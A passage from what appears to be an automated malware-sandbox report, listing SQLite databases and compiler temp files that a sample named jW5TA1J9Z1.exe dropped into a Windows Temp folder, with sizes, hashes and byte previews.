                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\QAm6HpEfKK

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\QEjUA9byCP

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\QOJq09Htiv

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\QXDvC7Dtis

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\QY9IoAvtwG

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\QcXCZ7SUv5

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\QdwGCF0xGj

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\QiZax40i7U

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\QqAtFwyVD7

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):98304
                                                                    Entropy (8bit):0.08235737944063153
                                                                    Encrypted:false
                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\R04fOTSXOl

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\R7CnQZbCj7

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\RESDF50.tmp

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d4, 10 symbols, created Wed Aug 21 09:57:27 2024, 1st section name ".debug$S"
                                                                    Category:modified
                                                                    Size (bytes):1932
                                                                    Entropy (8bit):4.628955843517792
                                                                    Encrypted:false
                                                                    SSDEEP:48:DaLz1aZtKOZm6lmuulB+hnqXSfbNtmh5N:en1eKOc62TkZzNty5N
                                                                    MD5:1FA4EE77F57FA9E9D8C7F6B24F8FE3D5
                                                                    SHA1:693A762C45A166452FC4655F4F0A518216C6A31A
                                                                    SHA-256:88E91996A4C559D736CBBF4EE3B8D2C8023E7B6D442CE94BCD2499C73743E4E9
                                                                    SHA-512:DFDC75BF2EE4E413875E63651B260E7296F9F9CEF18E8AF415AAF98CB62EA5848EEDF63E6A1B329A0981250CCAA9E30AE96816CCC08B06B9BE5766AC706BD6C8
                                                                    Malicious:false
                                                                    Preview:L......f.............debug$S........\...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC3376F6C86CE44268A97E49BC81EF4C9D.TMP....................q.QK.......N..........7.......C:\Users\user~1\AppData\Local\Temp\RESDF50.tmp.-.<....................a..Microsoft (R) CVTRES.b.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.

                                                                    C:\Users\user\AppData\Local\Temp\RESE4ED.tmp

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6f0, 10 symbols, created Wed Aug 21 09:57:28 2024, 1st section name ".debug$S"
                                                                    Category:modified
                                                                    Size (bytes):1960
                                                                    Entropy (8bit):4.5701173447307255
                                                                    Encrypted:false
                                                                    SSDEEP:24:HeS9YIO0goOwYZHZwKOZmN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+GUZ:Eh0rfYZiKOZmyluOulajfqXSfbNtmhxZ
                                                                    MD5:C0A2A0119349A6477AB14EED8AE8ABE4
                                                                    SHA1:6D3409850B6B44DF4BAD55A91E66B586B8E89A2A
                                                                    SHA-256:F2A98AB0570C36D4192192EF14EF6D8020A548898961DD3E25E21C4BF4A2247A
                                                                    SHA-512:30679AE2B1636CA91A7882E31E32BB21B638B38751837117D285AD9605190D7126F5206E8DD2E2A6DF20E8965B8AFF1D8A96207E1EE6352244098F5BE11D326A
                                                                    Malicious:false
                                                                    Preview:L......f.............debug$S........@...................@..B.rsrc$01................l...........@..@.rsrc$02........p...................@..@........=....c:\Windows\System32\CSC6D3A6DCEBAC9465EA9FC90BCE51AABF4.TMP.....................r.av..t.y..............7.......C:\Users\user~1\AppData\Local\Temp\RESE4ED.tmp.-.<....................a..Microsoft (R) CVTRES.b.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.

                                                                    C:\Users\user\AppData\Local\Temp\RGI3jMkMPi

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\RHIwGCOMlB

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\RR50meN08n

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\RUbiFxrlXr

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Rgsc1DlfnP

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\SDKc0XSrIk

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\SHn9ruybTV

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\SIRz1auruM

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\SKqkOJI2O2

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
